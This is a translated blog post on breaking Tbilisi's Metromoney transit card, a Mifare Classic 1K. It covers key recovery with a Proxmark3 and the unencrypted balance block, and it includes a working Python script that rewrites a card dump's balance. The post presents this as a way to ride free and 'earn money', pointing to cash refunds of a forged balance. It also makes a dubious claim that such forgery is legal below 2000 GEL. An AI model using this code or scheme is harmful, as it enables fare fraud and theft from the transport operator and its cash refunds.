
A study of the security of Tbilisi's transport system, or how to ride public transport and earn money

I hasten to warn you right away that Georgia has no analogue of Article 327 of the Criminal Code of the Russian Federation (forgery of documents), so all of the actions described here are legal until damage exceeding 2000 GEL (~50,000 rubles) is caused.

It is worth noting that the idea itself was inspired by three other articles, on the "Troika", "Podorozhnik" and "Sitikard" cards.

[image]
The transport system in Tbilisi is somewhat different from what residents of Russia are used to. You will not see trams or trolleybuses here; there are only buses, the metro, taxis and a cable car. The first two cost 50 tetri (~12.5 rubles), a marshrutka (minibus) 80 tetri, and the cable car 2 or 3 lari. All of this transport can be paid for with the Metromoney card.

A Proxmark3 was used to examine the card. First of all, we determine the type of RFID tag:

[image: Proxmark3 tag identification output]

As you can see, this is a Mifare Classic 1K with a 4-byte UID. Proxmark supports three attacks on Mifare Classic: darkside, nested and hardnested. This card is vulnerable to all three, unlike the Troika and Podorozhnik cards we already know. These attacks have long been known; they were described back in 2009.

The next step is to check the card against a list of well-known default keys; the nested attack needs at least one known sector key as a starting point, which is why this check comes first:

[image: default key check output]

As a result, we find the default key FFFFFFFFFFFF. Then we move on to the nested attack itself:

[image: nested attack output]

In response we get the card's keys, which is what we needed. As we remember, in the previous three publications the authors had to resort to a replay attack because the data was encrypted; here, instead, let's look at the data structure using MCT (MIFARE Classic Tool).

[image: card dump viewed in MCT]

There is no encryption, so all we have to do is write any amount we need into the value block where the 5 GEL balance is stored (remembering the > 2000 GEL limit). If you want to clone such a card, you also need to clone the UID, since its hash is stored in a separate block; this requires a UID-changeable "magic" card, because the UID of a genuine Mifare Classic is read-only. There is no online system for checking cards here: the turnstiles in the metro and on the cable car work offline, and so do the buses. Georgia is an interesting country, there are payment terminals that work with these offline transport cards.
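The data layout this step relies on, as an added example that is not from the original post: a standard Mifare Classic value block stores a signed 32-bit little-endian value three times (plain, inverted, plain) followed by an address byte and its complement, so anyone can validate a value block without knowing anything about the scheme, and anyone holding the sector key can rewrite it. The Python below encodes and decodes value blocks, scans a raw 1K dump for them, checks the UID's BCC byte in block 0 (relevant when cloning), lists sectors still on the factory key, and rewrites a balance. The dump, the UID, the choice of block 4 and the assumption that the balance is kept in tetri are all constructed for the demo, not taken from a real Metromoney card.

```python
import struct

BLOCK_SIZE = 16
BLOCKS = 64                     # Mifare Classic 1K: 16 sectors x 4 blocks
DEFAULT_KEY = bytes.fromhex("FFFFFFFFFFFF")
# Assumption for the demo only: the balance is stored in tetri (1 GEL = 100 tetri).
TETRI_PER_GEL = 100


def encode_value_block(value: int, addr: int) -> bytes:
    """Build a Mifare Classic value block: value, ~value, value (little-endian
    signed 32-bit) followed by addr, ~addr, addr, ~addr."""
    if not -2**31 <= value < 2**31:
        raise ValueError("value must fit in a signed 32-bit integer")
    if not 0 <= addr <= 0xFF:
        raise ValueError("address byte must be 0..255")
    v = struct.pack("<i", value)
    inv = bytes(b ^ 0xFF for b in v)
    return v + inv + v + bytes([addr, addr ^ 0xFF, addr, addr ^ 0xFF])


def decode_value_block(block: bytes):
    """Return (value, addr) if the block passes the value-block redundancy check, else None."""
    if len(block) != BLOCK_SIZE:
        return None
    v, inv, v2, a = block[0:4], block[4:8], block[8:12], block[12:16]
    if v != v2 or bytes(b ^ 0xFF for b in v) != inv:
        return None
    if not (a[0] == a[2] and a[1] == a[3] and a[0] ^ 0xFF == a[1]):
        return None
    return struct.unpack("<i", v)[0], a[0]


def block_at(dump: bytes, n: int) -> bytes:
    return dump[n * BLOCK_SIZE:(n + 1) * BLOCK_SIZE]


def read_uid(dump: bytes):
    """UID and BCC check from block 0 of a 4-byte-UID card (BCC = XOR of the UID bytes)."""
    b0 = block_at(dump, 0)
    uid, bcc = b0[:4], b0[4]
    return uid, (uid[0] ^ uid[1] ^ uid[2] ^ uid[3]) == bcc


def default_key_sectors(dump: bytes):
    """Sectors whose trailer still carries the factory key FFFFFFFFFFFF as key A or key B."""
    out = []
    for s in range(BLOCKS // 4):
        trailer = block_at(dump, s * 4 + 3)
        if trailer[0:6] == DEFAULT_KEY or trailer[10:16] == DEFAULT_KEY:
            out.append(s)
    return out


def find_value_blocks(dump: bytes):
    """All (block_no, value, addr) triples in the dump that pass the value-block self-check."""
    found = []
    for n in range(1, BLOCKS):          # block 0 holds manufacturer data, skip it
        if n % 4 == 3:                  # sector trailers hold keys and access bits, skip them
            continue
        decoded = decode_value_block(block_at(dump, n))
        if decoded is not None:
            found.append((n, decoded[0], decoded[1]))
    return found


def set_balance(dump: bytes, block_no: int, new_value: int) -> bytes:
    """Rewrite the value block at block_no with a new value, keeping its address byte."""
    decoded = decode_value_block(block_at(dump, block_no))
    if decoded is None:
        raise ValueError(f"block {block_no} is not a value block")
    new_block = encode_value_block(new_value, decoded[1])
    return dump[:block_no * BLOCK_SIZE] + new_block + dump[(block_no + 1) * BLOCK_SIZE:]


def build_sample_dump(uid: bytes, balance_block: int, balance_tetri: int) -> bytes:
    """Constructed 1K dump for the demo (not a real Metromoney dump): a manufacturer
    block, one value block, and every sector trailer on the default key with the
    factory transport-configuration access bits FF 07 80 and user byte 69."""
    blocks = [bytes(BLOCK_SIZE)] * BLOCKS
    bcc = uid[0] ^ uid[1] ^ uid[2] ^ uid[3]
    blocks[0] = uid + bytes([bcc, 0x08, 0x04, 0x00]) + bytes(8)   # UID, BCC, SAK, ATQA, filler
    blocks[balance_block] = encode_value_block(balance_tetri, balance_block)
    for s in range(BLOCKS // 4):
        blocks[s * 4 + 3] = DEFAULT_KEY + bytes.fromhex("FF078069") + DEFAULT_KEY
    return b"".join(blocks)


if __name__ == "__main__":
    dump = build_sample_dump(bytes.fromhex("11223344"), balance_block=4,
                             balance_tetri=5 * TETRI_PER_GEL)
    uid, bcc_ok = read_uid(dump)
    print("UID", uid.hex(), "BCC ok:", bcc_ok)
    print("sectors on default key:", default_key_sectors(dump))
    for n, value, addr in find_value_blocks(dump):
        print(f"block {n}: {value} tetri = {value / TETRI_PER_GEL:.2f} GEL (addr byte {addr})")
    modified = set_balance(dump, 4, 100 * TETRI_PER_GEL)
    print("after rewrite:", find_value_blocks(modified))
```

Run as a script, it finds the constructed 5 GEL balance in block 4 and rewrites it to 100 GEL. On a raw 1024-byte dump of a real card, `find_value_blocks` is the quickest way to see which blocks hold a balance; a block that fails the redundancy check is either not a value block or has been corrupted, and a card whose trailers all show the factory key is exactly the situation the article describes.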

[image: payment terminals]
In the photo, the rightmost one. At the bottom you can see a special place where the RFID tag is to be placed.

We can present a card with any balance we like; the terminal will display it without any problem and offer to top it up.

There is also a small nuance here: such a card can be handed back to the cashier with a refund of the entire balance on it (!) plus the deposit, within 30 days of purchase, upon presentation of the receipt and the card itself.

The article would be incomplete if I did not mention the local debit card from Express Bank. Quite by chance, a Georgian student's social card ended up in my hands; it looks like this:

[image: the student social card]

The RFID tag itself is a JCOP41 with Mifare Classic 1K emulation.

[image: tag identification output]

Of course, I will not pay for anything with a bank card with a modified balance, because jokes with banks rarely end well, so I did not go any further than reading the data from the card.

[image]

As user 532CDCCC1022 correctly noted, all transport systems are insecure to some degree. Using decade-old solutions only makes them more vulnerable.

P.S. All coincidences are accidental, and these actions were performed by some unnamed Jedi.

Source: https://habr.com/ru/post/335702/

